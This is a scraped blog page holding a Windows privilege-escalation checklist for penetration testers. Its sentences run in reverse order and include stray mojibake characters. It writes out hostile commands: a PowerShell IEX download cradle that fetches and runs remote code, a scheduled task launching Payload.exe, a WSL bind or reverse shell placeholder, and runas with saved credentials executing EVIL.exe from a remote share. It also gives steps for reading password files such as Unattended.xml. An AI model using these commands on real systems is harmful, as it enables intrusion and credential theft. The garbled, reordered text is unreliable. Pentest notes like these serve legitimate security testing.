![]() ![]() IEX(New-Object Net.Webclient).downloadString(‘ This script will run all common areas of misconfiguration that allow for a regular user to get a local administrative or system account. Script used to check for common privilege escalation vulnerabilities on a target system. WinPEASany.exe winPEAS圆4.exe winPEASx86.exe NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. This can be exploited to obtain the privileges of a process connecting to them.Ĭheck for GUI apps running as SYSTEM allowing an user to spawn a Command Prompt, or browse directories.Īt 08:00 /interactive “C:\Windows\temp\Payload.exe”Ĭreate a scheduled task which will execute malicious code. ::GetFiles(“\\.\pipe\”)Ĭheck for Named Pipes. This can be used to run malicious executables. Icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartupĬheck if we have access to the Startup folder. Use findstr with the KB patch numbers to display installed patches and see if any are missing.Ĭheck if we are a local admin, if so we can escalate to NT SYSTEM. Wmic qfe get Caption,Description,HotFixID,InstalledOnĬheck level of patch to find kernel exploits. Wsl python -c ‘BIND_OR_REVERSE_SHELL_PYTHON_CODE’Ĭheck if Windows Subsystem for Linux is enabled in the machine, if so this can be exploited to get a bind/reverse shell. Use the Runas command to run commands as a privileged user using saved credentials. More info here.Ĭmdkey /list runas /savecred /user:WORKGROUP\Administrator ” \\IP\SHARE\EVIL.exe” Juicy/Rotten Potato can be used to exploit this. More info here.Ĭheck for the SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege privileges. If services have unquoted service paths, these can be used to run malicious executable files. This allows to reconfigure a service and make it run an arbitrary executable. More info here.Īccesschk.exe -uwqs “Authenticated Users” *Ĭheck for Weak Permissions in the OS. Reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedĬheck for the “AlwaysInstallElevated” registry setting, if this is enabled it allows all users install *.msi files as NT AUTHORITY\SYSTEM. Type c:\sysprep.inf, %WINDIR%\Panther\Unattended.xml etc.Ĭheck for files containing passwords or hashes. Perform basic information gathering steps. Systeminfo whoami /all net users netstat -ano, ipconfig /all tasklist etc. Privilege escalation is a crucial step in the penetration testing lifecycle, through this checklist I intend to cover all the main vectors used in Windows privilege escalation, and some of my personal notes that I used in previous penetration tests.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |